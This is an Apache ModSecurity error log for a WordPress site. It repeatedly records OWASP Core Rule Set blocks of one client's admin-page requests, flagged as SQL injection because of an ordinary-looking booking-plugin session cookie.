[Mon May 11 18:33:38.247004 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE4kWKUxpmnkK7zHysAwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:39.019324 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE4kWKUxpmnkK7zHysAwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:39.624572 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE40WKUxpmnkK7zHysBAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:39.624858 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE40WKUxpmnkK7zHysBAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:40.474671 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE40WKUxpmnkK7zHysBAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:40.867478 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE5EWKUxpmnkK7zHysBgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:40.867801 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE5EWKUxpmnkK7zHysBgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:41.797793 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE5EWKUxpmnkK7zHysBgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:41.903120 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE5UWKUxpmnkK7zHysCAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:41.903445 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE5UWKUxpmnkK7zHysCAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:42.862572 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE5UWKUxpmnkK7zHysCAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:42.950447 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE5kWKUxpmnkK7zHysCgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:42.950738 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE5kWKUxpmnkK7zHysCgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:43.373781 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE5kWKUxpmnkK7zHysCgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:44.549192 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE6EWKUxpmnkK7zHysDAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:44.549597 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE6EWKUxpmnkK7zHysDAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:45.150046 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE6EWKUxpmnkK7zHysDAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:45.559649 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE6UWKUxpmnkK7zHysDgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:45.559967 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE6UWKUxpmnkK7zHysDgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:46.208435 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE6UWKUxpmnkK7zHysDgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:46.613452 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE6kWKUxpmnkK7zHysEAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:46.613751 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIE6kWKUxpmnkK7zHysEAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:47.253059 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE6kWKUxpmnkK7zHysEAAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:47.721430 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE60WKUxpmnkK7zHysEgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:47.721868 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIE60WKUxpmnkK7zHysEgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:48.280887 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE60WKUxpmnkK7zHysEgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:48.360000 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE7EWKUxpmnkK7zHysEwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:48.360297 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIE7EWKUxpmnkK7zHysEwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:48.948947 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE7EWKUxpmnkK7zHysEwAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:49.181802 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE7UWKUxpmnkK7zHysFQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:49.182143 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIE7UWKUxpmnkK7zHysFQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:49.564807 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE7UWKUxpmnkK7zHysFQAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:50.041211 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE7kWKUxpmnkK7zHysFgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:50.041545 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIE7kWKUxpmnkK7zHysFgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:50.727728 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIE7kWKUxpmnkK7zHysFgAAARM"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:33:51.080133 2026] [security2:error] [pid 1411055:tid 1411076] [client 31.57.184.104:59399] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIE70WKUxpmnkK7zHysGAAAARM"], referer: https://rentparadise.fr/wp-login.php
